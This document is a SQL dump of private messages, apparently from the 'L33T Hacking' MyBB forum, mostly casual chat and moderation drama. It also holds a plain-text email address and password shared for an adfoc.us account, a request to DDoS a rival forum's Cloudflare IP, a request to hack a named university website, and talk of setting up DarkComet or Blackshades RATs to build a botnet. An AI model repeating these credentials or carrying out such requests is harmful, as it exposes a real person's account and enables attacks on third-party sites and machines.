I SHOULD boost your adfoc.us views^^\r\nThanks a million.\r\n[/quote]\r\n\r\nI\'m really glad that you love it\r\nThanks bro\r\n\r\nWhat should i give to you to boost my adfoc.us\r\n\r\nLink: http://adfoc.us/938301\r\n\r\nIf you need help with anything just contact me \r\n[/quote]\r\nI need your adfoc,us login infos. You can change it to something simple. I need the access to make more links. I wont change anything', '1351531004', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3878', '53', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'Re: Reply fast', '0', '[quote=\'sirchamp\']\r\n[quote=\'VirtualLegend\']\r\n[quote=\'sirchamp\']\r\n[quote=\'VirtualLegend\']\r\nWhat do you think: [url=http://i.imgur.com/u6W1O.jpg]http://i.imgur.com/u6W1O.jpg[/url]\r\n\r\n[/quote]\r\nThanks sooo muuch <33 you. So nice. :D \r\ni FUCKING LOVE YOU. Tell me if I SHOULD boost your adfoc.us views^^\r\nThanks a million.\r\n[/quote]\r\n\r\nI\'m really glad that you love it\r\nThanks bro\r\n\r\nWhat should i give to you to boost my adfoc.us\r\n\r\nLink: http://adfoc.us/938301\r\n\r\nIf you need help with anything just contact me \r\n[/quote]\r\nI need your adfoc,us login infos. You can change it to something simple. I need the access to make more links. I wont change anything\r\n[/quote]\r\n\r\ne-mail: ielmessaoudi@unic-utrecht.nl\r\nPass: sirchamp123', '1351531131', '0', '1', '0', '1', '0', '2', '1351531282'); INSERT INTO mybb_privatemessages VALUES('3879', '228', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: Reply fast', '0', '[quote=\'sirchamp\']\r\n[quote=\'VirtualLegend\']\r\n[quote=\'sirchamp\']\r\n[quote=\'VirtualLegend\']\r\nWhat do you think: [url=http://i.imgur.com/u6W1O.jpg]http://i.imgur.com/u6W1O.jpg[/url]\r\n\r\n[/quote]\r\nThanks sooo muuch <33 you. So nice. :D \r\ni FUCKING LOVE YOU. Tell me if I SHOULD boost your adfoc.us views^^\r\nThanks a million.\r\n[/quote]\r\n\r\nI\'m really glad that you love it\r\nThanks bro\r\n\r\nWhat should i give to you to boost my adfoc.us\r\n\r\nLink: http://adfoc.us/938301\r\n\r\nIf you need help with anything just contact me \r\n[/quote]\r\nI need your adfoc,us login infos. You can change it to something simple. I need the access to make more links. I wont change anything\r\n[/quote]\r\n\r\ne-mail: ielmessaoudi@unic-utrecht.nl\r\nPass: sirchamp123', '1351531131', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3880', '53', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'Sup', '0', 'How long is it gonna take :P \r\n\r\nI can\'t wait :D\r\n\r\nThanks for doing this your AWESOME', '1351535975', '0', '1', '0', '1', '0', '2', '1351537482'); INSERT INTO mybb_privatemessages VALUES('3881', '228', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Sup', '0', 'How long is it gonna take :P \r\n\r\nI can\'t wait :D\r\n\r\nThanks for doing this your AWESOME', '1351535975', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3882', '53', '53', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'Here it is', '0', 'I\'m not acting like i\'m better than everyone else. But if that\'s your choice and you want to argue you can. I deleted the argument off your thread because it\'s unprofessional on both our behaves.\r\n\r\nI don\'t know what i\'ve done to you to make you be a dick towards me but if you want to keep it up that\'s fine and your choice.\r\n\r\n\r\n\r\n', '1351536383', '0', '1', '0', '1', '0', '2', '1351537454'); INSERT INTO mybb_privatemessages VALUES('3883', '61', '53', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Here it is', '0', 'I\'m not acting like i\'m better than everyone else. But if that\'s your choice and you want to argue you can. I deleted the argument off your thread because it\'s unprofessional on both our behaves.\r\n\r\nI don\'t know what i\'ve done to you to make you be a dick towards me but if you want to keep it up that\'s fine and your choice.\r\n\r\n\r\n\r\n', '1351536383', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3884', '53', '53', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'Views', '0', 'Hi,\r\n\r\nDid you bot views on your adfocus thread? I would like you to be honest.', '1351537071', '0', '3', '1351537450', '1', '0', '0', '1351537408'); INSERT INTO mybb_privatemessages VALUES('3950', '100', '100', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '1', 'Re: Sup', '0', '[quote=\'??zg???g????61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??zg???g????61\']\r\n[quote=\'t3h jok3r\']\r\nSup long time no chat.\r\n[/quote]\r\n\r\nYeah man. Sorry about the inactivity. I\'ve been pretty busy. Hows everything?\r\n[/quote]\r\n\r\nNp, everythings cool. The hurricane came by and thank god nothing happen to me or my family. Did it come to your side?\r\n[/quote]\r\n\r\n\r\nYeah but we\'re all good\r\n[/quote]\r\n\r\nThat\'s good. Did anything much happen to your area?', '1351736363', '0', '3', '1351791877', '1', '0', '0', '1351791833'); INSERT INTO mybb_privatemessages VALUES('3952', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: hey', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'XxTREYZxX\']\r\nHey man whats happening \r\n[/quote]\r\n\r\n1. No gasoline for the next 3 days and my car is out of gas.\r\n2. All subways and buses shut down.\r\n3. Luckily my block is the only block with electricity which also means no fast food :(\r\n4. 80% of the roads are blocked because either homes are broken or roads are full of trees and I mean tress that fell down.\r\n5. I send a company to replace my PC because the speakers weren\'t working properly and they told me to come back tomorrow but since I can\'t do there so no computer for me to the next 4-6 days. My sibling has a computer but it\'s provided by their university so can\'t access LH as they keep logs.\r\n6. Can\'t drink tap water as the mayor clearly said that do not drink tap water because due to their pipes being overfull they let the dirty water through so now I have to buy and drink bottle water.\r\n[/quote]\r\n\r\nWow you are doing it hard i feel sorry for you brahh you will get there :((((', '1351736432', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3953', '257', '257', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: hey', '0', '[quote=\'XxTREYZxX\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'XxTREYZxX\']\r\nHey man whats happening \r\n[/quote]\r\n\r\n1. No gasoline for the next 3 days and my car is out of gas.\r\n2. All subways and buses shut down.\r\n3. Luckily my block is the only block with electricity which also means no fast food :(\r\n4. 80% of the roads are blocked because either homes are broken or roads are full of trees and I mean tress that fell down.\r\n5. I send a company to replace my PC because the speakers weren\'t working properly and they told me to come back tomorrow but since I can\'t do there so no computer for me to the next 4-6 days. My sibling has a computer but it\'s provided by their university so can\'t access LH as they keep logs.\r\n6. Can\'t drink tap water as the mayor clearly said that do not drink tap water because due to their pipes being overfull they let the dirty water through so now I have to buy and drink bottle water.\r\n[/quote]\r\n\r\nWow you are doing it hard i feel sorry for you brahh you will get there :((((\r\n[/quote]\r\n\r\nThanks and yeah my life sucks atm. Trying my best', '1351736811', '0', '3', '1351737304', '1', '0', '0', '1351737271'); INSERT INTO mybb_privatemessages VALUES('3955', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: hey', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'XxTREYZxX\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'XxTREYZxX\']\r\nHey man whats happening \r\n[/quote]\r\n\r\n1. No gasoline for the next 3 days and my car is out of gas.\r\n2. All subways and buses shut down.\r\n3. Luckily my block is the only block with electricity which also means no fast food :(\r\n4. 80% of the roads are blocked because either homes are broken or roads are full of trees and I mean tress that fell down.\r\n5. I send a company to replace my PC because the speakers weren\'t working properly and they told me to come back tomorrow but since I can\'t do there so no computer for me to the next 4-6 days. My sibling has a computer but it\'s provided by their university so can\'t access LH as they keep logs.\r\n6. Can\'t drink tap water as the mayor clearly said that do not drink tap water because due to their pipes being overfull they let the dirty water through so now I have to buy and drink bottle water.\r\n[/quote]\r\n\r\nWow you are doing it hard i feel sorry for you brahh you will get there :((((\r\n[/quote]\r\n\r\nThanks and yeah my life sucks atm. Trying my best\r\n[/quote]\r\n\r\nman i dont know what to say atm', '1351737304', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3956', '61', '61', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Don\'t handle the report', '0', 'There\'s one unread reported post. Please do not take any action on it, I want to see if Apathy even does something when he gets a chance or not.', '1351752197', '0', '3', '1351770850', '1', '0', '0', '1351770834'); INSERT INTO mybb_privatemessages VALUES('3958', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: YouTube', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\nThe following video belongs to you. This video is the 2nd result you get when you type in l33t hacking or l33thacking on Google. I was wondering if you could update the URL on the video from .com to .net also fix the link on your adf.ly referral.\r\n[/quote]\r\nFixed link I think. Not sure.\r\n[/quote]\r\n\r\nActually if you don\'t mind can you take it down because it says \"l33thackingcom\" is our twitter but it\'s \"l33thackingnet\" now.\r\n[/quote]\r\n\r\n._. okay...', '1351769135', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3960', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Don\'t handle the report', '0', '[quote=\'t3h jok3r\']\r\nThere\'s one unread reported post. Please do not take any action on it, I want to see if Apathy even does something when he gets a chance or not.\r\n[/quote]\r\n\r\nAlright will do.', '1351770850', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3961', '61', '61', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'sup', '0', 'Lol do you really know the method that sirchamp is using or are you just kidding?', '1351784687', '0', '3', '1351794093', '1', '0', '2', '1351794034'); INSERT INTO mybb_privatemessages VALUES('3962', '228', '61', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'sup', '0', 'Lol do you really know the method that sirchamp is using or are you just kidding?', '1351784687', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3963', '61', '61', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Re: Don\'t handle the report', '0', '[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\nThere\'s one unread reported post. Please do not take any action on it, I want to see if Apathy even does something when he gets a chance or not.\r\n[/quote]\r\n\r\nAlright will do.\r\n[/quote]\r\nThanks.', '1351791576', '0', '1', '0', '1', '0', '0', '1351794027'); INSERT INTO mybb_privatemessages VALUES('3964', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Re: YouTube', '0', '[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\nThe following video belongs to you. This video is the 2nd result you get when you type in l33t hacking or l33thacking on Google. I was wondering if you could update the URL on the video from .com to .net also fix the link on your adf.ly referral.\r\n[/quote]\r\nFixed link I think. Not sure.\r\n[/quote]\r\n\r\nActually if you don\'t mind can you take it down because it says \"l33thackingcom\" is our twitter but it\'s \"l33thackingnet\" now.\r\n[/quote]\r\n\r\n._. okay...\r\n[/quote]\r\nthanks and sorry your hard work went into drain.', '1351791646', '0', '1', '0', '1', '0', '0', '1351798441'); INSERT INTO mybb_privatemessages VALUES('3966', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??zg???g????61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??zg???g????61\']\r\n[quote=\'t3h jok3r\']\r\nSup long time no chat.\r\n[/quote]\r\n\r\nYeah man. Sorry about the inactivity. I\'ve been pretty busy. Hows everything?\r\n[/quote]\r\n\r\nNp, everythings cool. The hurricane came by and thank god nothing happen to me or my family. Did it come to your side?\r\n[/quote]\r\n\r\n\r\nYeah but we\'re all good\r\n[/quote]\r\n\r\nThat\'s good. Did anything much happen to your area?\r\n[/quote]\r\n\r\nSome trees fell. Not much though. I heard new Jersey got hit HARD.', '1351791877', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3967', '100', '100', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '1', 'Re: Sup', '0', '[quote=\'??zg???g????61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??zg???g????61\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??zg???g????61\']\r\n[quote=\'t3h jok3r\']\r\nSup long time no chat.\r\n[/quote]\r\n\r\nYeah man. Sorry about the inactivity. I\'ve been pretty busy. Hows everything?\r\n[/quote]\r\n\r\nNp, everythings cool. The hurricane came by and thank god nothing happen to me or my family. Did it come to your side?\r\n[/quote]\r\n\r\n\r\nYeah but we\'re all good\r\n[/quote]\r\n\r\nThat\'s good. Did anything much happen to your area?\r\n[/quote]\r\n\r\nSome trees fell. Not much though. I heard new Jersey got hit HARD.\r\n[/quote]yeah NJ had the most impact I believe.', '1351792215', '0', '1', '0', '1', '0', '0', '1352342104'); INSERT INTO mybb_privatemessages VALUES('3968', '228', '228', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: sup', '0', '[quote=\'VirtualLegend\']\r\nLol do you really know the method that sirchamp is using or are you just kidding?\r\n[/quote]\r\n\r\nYeah I have it, Want it? idk if it\'s patched or not I haven\'t used it in like 2 days because I raped it for 120$ But I can send it to you if you want.', '1351794093', '0', '1', '0', '1', '0', '2', '1351795118'); INSERT INTO mybb_privatemessages VALUES('3969', '61', '228', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: sup', '0', '[quote=\'VirtualLegend\']\r\nLol do you really know the method that sirchamp is using or are you just kidding?\r\n[/quote]\r\n\r\nYeah I have it, Want it? idk if it\'s patched or not I haven\'t used it in like 2 days because I raped it for 120$ But I can send it to you if you want.', '1351794093', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3971', '310', '310', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"310\";}}', '1', 'HELLO', '0', 'Hello mate, you would wanna post a introduction.So every one can see who you are :P', '1351800007', '0', '0', '0', '1', '0', '1', '0'); INSERT INTO mybb_privatemessages VALUES('3972', '257', '310', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"310\";}}', '2', 'HELLO', '0', 'Hello mate, you would wanna post a introduction.So every one can see who you are :P', '1351800007', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3974', '194', '194', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"194\";}}', '1', 'Gamers', '0', 'You\'ve been Accepted. Please give us some time to gather more members\r\n', '1351818597', '0', '0', '0', '1', '0', '1', '0'); INSERT INTO mybb_privatemessages VALUES('3975', '61', '194', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"194\";}}', '2', 'Gamers', '0', 'You\'ve been Accepted. Please give us some time to gather more members\r\n', '1351818597', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3977', '54', '1', '54', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'mate', '0', 'i will not post in your forum before 11 of this month as i busy...\r\nhope you will understand.', '1351836028', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3978', '54', '54', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"54\";}}', '1', 'Re: mate', '0', '[quote=\'Sin Cara\']\r\ni will not post in your forum before 11 of this month as i busy...\r\nhope you will understand.\r\n[/quote]\r\n\r\nOk.', '1351836550', '0', '1', '0', '1', '0', '0', '1351837292'); INSERT INTO mybb_privatemessages VALUES('3979', '100', '100', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '1', 'DDoS service', '0', 'I need you to hit anarchyforums on their cloudflare IP. Doesn\'t matter how long but at least 4 mins would be highly appreciated. Do it anytime when you are free.', '1351842610', '0', '3', '1352342101', '1', '0', '0', '1352342073'); INSERT INTO mybb_privatemessages VALUES('3980', '53', '53', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'hey', '0', 'hey JW is breshie banned\r\nand for what', '1351874514', '0', '3', '1351875457', '1', '0', '2', '1351875429'); INSERT INTO mybb_privatemessages VALUES('3981', '257', '53', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'hey', '0', 'hey JW is breshie banned\r\nand for what', '1351874514', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3982', '257', '257', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: hey', '0', '[quote=\'XxTREYZxX\']\r\nhey JW is breshie banned\r\nand for what\r\n[/quote]\r\nHe backstabbed thejoker.\r\n', '1351875457', '0', '3', '1351875679', '1', '0', '2', '1351875646'); INSERT INTO mybb_privatemessages VALUES('3983', '53', '257', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hey', '0', '[quote=\'XxTREYZxX\']\r\nhey JW is breshie banned\r\nand for what\r\n[/quote]\r\nHe backstabbed thejoker.\r\n', '1351875457', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3984', '53', '53', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'Re: hey', '0', '[quote=\'sirchamp\']\r\n[quote=\'XxTREYZxX\']\r\nhey JW is breshie banned\r\nand for what\r\n[/quote]\r\nHe backstabbed thejoker.\r\n\r\n[/quote]\r\n\r\nReally by doing what', '1351875679', '0', '3', '1351876182', '1', '0', '2', '1351876131'); INSERT INTO mybb_privatemessages VALUES('3985', '257', '53', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: hey', '0', '[quote=\'sirchamp\']\r\n[quote=\'XxTREYZxX\']\r\nhey JW is breshie banned\r\nand for what\r\n[/quote]\r\nHe backstabbed thejoker.\r\n\r\n[/quote]\r\n\r\nReally by doing what', '1351875679', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3986', '257', '257', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: hey', '0', '[quote=\'XxTREYZxX\']\r\n[quote=\'sirchamp\']\r\n[quote=\'XxTREYZxX\']\r\nhey JW is breshie banned\r\nand for what\r\n[/quote]\r\nHe backstabbed thejoker.\r\n\r\n[/quote]\r\n\r\nReally by doing what\r\n[/quote]\r\nDont know... We shall find out in the next few hours :)', '1351876182', '0', '3', '1351876335', '1', '0', '2', '1351876296'); INSERT INTO mybb_privatemessages VALUES('3987', '53', '257', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hey', '0', '[quote=\'XxTREYZxX\']\r\n[quote=\'sirchamp\']\r\n[quote=\'XxTREYZxX\']\r\nhey JW is breshie banned\r\nand for what\r\n[/quote]\r\nHe backstabbed thejoker.\r\n\r\n[/quote]\r\n\r\nReally by doing what\r\n[/quote]\r\nDont know... We shall find out in the next few hours :)', '1351876182', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3988', '53', '53', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'Re: hey', '0', '[quote=\'sirchamp\']\r\n[quote=\'XxTREYZxX\']\r\n[quote=\'sirchamp\']\r\n[quote=\'XxTREYZxX\']\r\nhey JW is breshie banned\r\nand for what\r\n[/quote]\r\nHe backstabbed thejoker.\r\n\r\n[/quote]\r\n\r\nReally by doing what\r\n[/quote]\r\nDont know... We shall find out in the next few hours :)\r\n[/quote]\r\n\r\nwho would do that do a great admin', '1351876335', '0', '1', '0', '1', '0', '2', '1351876503'); INSERT INTO mybb_privatemessages VALUES('3989', '257', '53', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: hey', '0', '[quote=\'sirchamp\']\r\n[quote=\'XxTREYZxX\']\r\n[quote=\'sirchamp\']\r\n[quote=\'XxTREYZxX\']\r\nhey JW is breshie banned\r\nand for what\r\n[/quote]\r\nHe backstabbed thejoker.\r\n\r\n[/quote]\r\n\r\nReally by doing what\r\n[/quote]\r\nDont know... We shall find out in the next few hours :)\r\n[/quote]\r\n\r\nwho would do that do a great admin', '1351876335', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3991', '257', '257', '313', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Pyrox', '0', 'Hey its me pyrox', '1351876504', '0', '3', '1351876711', '1', '0', '0', '1351876683'); INSERT INTO mybb_privatemessages VALUES('3992', '313', '257', '313', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Pyrox', '0', 'Hey its me pyrox', '1351876504', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3993', '313', '313', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"313\";}}', '1', 'Re: Pyrox', '0', '[quote=\'LSD\']\r\nHey its me pyrox\r\n[/quote]\r\n\r\nHello and welcome ', '1351876711', '0', '1', '0', '1', '0', '2', '1351876791'); INSERT INTO mybb_privatemessages VALUES('3994', '257', '313', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"313\";}}', '2', 'Re: Pyrox', '0', '[quote=\'LSD\']\r\nHey its me pyrox\r\n[/quote]\r\n\r\nHello and welcome ', '1351876711', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3995', '53', '53', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'My rep', '0', 'hello i see you are viewing my rep aahhah lol', '1351877352', '0', '1', '0', '1', '0', '2', '1351887198'); INSERT INTO mybb_privatemessages VALUES('3996', '257', '53', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'My rep', '0', 'hello i see you are viewing my rep aahhah lol', '1351877352', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3997', '82', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Fuuuuuu', '0', 'Everyone knows what earn\'t is it\'s like say if you earn money \r\n.But your asking someone else.So earn\'t.\r\nIt\'s that simple so yeah.\r\nThats not LQ.\r\nEverything that you say i as mean,You say nothing nice about me.\r\nI have been very nice to you.', '1351888323', '0', '3', '1351890691', '1', '0', '2', '1351890633'); INSERT INTO mybb_privatemessages VALUES('3998', '257', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Fuuuuuu', '0', 'Everyone knows what earn\'t is it\'s like say if you earn money \r\n.But your asking someone else.So earn\'t.\r\nIt\'s that simple so yeah.\r\nThats not LQ.\r\nEverything that you say i as mean,You say nothing nice about me.\r\nI have been very nice to you.', '1351888323', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3999', '257', '257', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: Fuuuuuu', '0', '[quote=\'XxTREYZxX\']\r\nEveryone knows what earn\'t is it\'s like say if you earn money \r\n.But your asking someone else.So earn\'t.\r\nIt\'s that simple so yeah.\r\nThats not LQ.\r\nEverything that you say i as mean,You say nothing nice about me.\r\nI have been very nice to you.\r\n[/quote]\r\nSir, you said FUUU to me..\r\n-.-\r\nI don\'t see what you\'re trying to say.\r\nEarn\'t isn\'t a word. Earned is. K? Get your facts straight.', '1351890691', '0', '3', '1351891056', '1', '0', '2', '1351891016'); INSERT INTO mybb_privatemessages VALUES('4000', '82', '257', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: Fuuuuuu', '0', '[quote=\'XxTREYZxX\']\r\nEveryone knows what earn\'t is it\'s like say if you earn money \r\n.But your asking someone else.So earn\'t.\r\nIt\'s that simple so yeah.\r\nThats not LQ.\r\nEverything that you say i as mean,You say nothing nice about me.\r\nI have been very nice to you.\r\n[/quote]\r\nSir, you said FUUU to me..\r\n-.-\r\nI don\'t see what you\'re trying to say.\r\nEarn\'t isn\'t a word. Earned is. K? Get your facts straight.', '1351890691', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4001', '82', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Re: Fuuuuuu', '0', '[quote=\'iTzIpod\']\r\n[quote=\'XxTREYZxX\']\r\nEveryone knows what earn\'t is it\'s like say if you earn money \r\n.But your asking someone else.So earn\'t.\r\nIt\'s that simple so yeah.\r\nThats not LQ.\r\nEverything that you say i as mean,You say nothing nice about me.\r\nI have been very nice to you.\r\n[/quote]\r\nSir, you said FUUU to me..\r\n-.-\r\nI don\'t see what you\'re trying to say.\r\nEarn\'t isn\'t a word. Earned is. K? Get your facts straight.\r\n[/quote]\r\n\r\nYou know what i not going to bother :/', '1351891056', '0', '1', '0', '1', '0', '2', '1351891150'); INSERT INTO mybb_privatemessages VALUES('4002', '257', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Fuuuuuu', '0', '[quote=\'iTzIpod\']\r\n[quote=\'XxTREYZxX\']\r\nEveryone knows what earn\'t is it\'s like say if you earn money \r\n.But your asking someone else.So earn\'t.\r\nIt\'s that simple so yeah.\r\nThats not LQ.\r\nEverything that you say i as mean,You say nothing nice about me.\r\nI have been very nice to you.\r\n[/quote]\r\nSir, you said FUUU to me..\r\n-.-\r\nI don\'t see what you\'re trying to say.\r\nEarn\'t isn\'t a word. Earned is. K? Get your facts straight.\r\n[/quote]\r\n\r\nYou know what i not going to bother :/', '1351891056', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4011', '319', '319', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"319\";}}', '1', 'Welcome to L33T Hacking!', '0', 'Welcome to our forum xcore03.\r\n\r\nI am the founder of the L33THacking, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.net/showteam.php]Staff list[/url].\r\n\r\nFeel free to view our [url=http://l33thacking.net/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents.\r\n\r\nHope you enjoy our forums.\r\n\r\nL33T Hacking\r\nhttp://l33thacking.net', '1352018664', '0', '1', '0', '0', '0', '0', '1352201144'); INSERT INTO mybb_privatemessages VALUES('4012', '223', '223', '319', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"223\";}}', '1', 'favor sir', '0', 'hello starz, i have a favor to ask you.\r\ncan you try to hack this site >> wmsu.edu.ph\r\ni want to know if the site is hackable. thanks :)', '1352020155', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4013', '319', '223', '319', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"223\";}}', '2', 'favor sir', '0', 'hello starz, i have a favor to ask you.\r\ncan you try to hack this site >> wmsu.edu.ph\r\ni want to know if the site is hackable. thanks :)', '1352020155', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4014', '5', '5', '160', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '1', 'Re: Hey Guys', '0', '[quote=\'Timmy\']\r\n[quote=\'Jacob\']\r\nDo you want to help me set up the RAT, and build a BotNet?\r\n[/quote]\r\n\r\nSure what RAT are you using?\r\n[/quote]\r\n\r\nAny, \r\n\r\nDarkComet Or Black shades', '1352032118', '0', '3', '1352186480', '1', '0', '0', '1352186390'); INSERT INTO mybb_privatemessages VALUES('4015', '160', '5', '160', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Re: Hey Guys', '0', '[quote=\'Timmy\']\r\n[quote=\'Jacob\']\r\nDo you want to help me set up the RAT, and build a BotNet?\r\n[/quote]\r\n\r\nSure what RAT are you using?\r\n[/quote]\r\n\r\nAny, \r\n\r\nDarkComet Or Black shades', '1352032118', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4016', '1', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '1', 'Re: Need image for advert', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'R?????zo?\']\r\n[quote=\'t3h jok3r\']\r\nI know you have a busy schedule but I really need help. \r\n\r\nI need something like a slogan or something, I will using it to put put ADs on other sites. I need it to say l33thacking and join us OR what L33T Hacking is about. Anything attractive.\r\n\r\nThe size should be 700x90 or anything smaller.\r\n\r\nThanks a bunch.\r\n[/quote]\r\n\r\ncan this wait 1-2 days? I\'m really busy latetly :/\r\n[/quote]\r\n\r\nyeah sure.\r\n[/quote]\r\n\r\nwhat slogan would you prefer?\r\nI\'m really bad to pick slogans :/', '1352033842', '0', 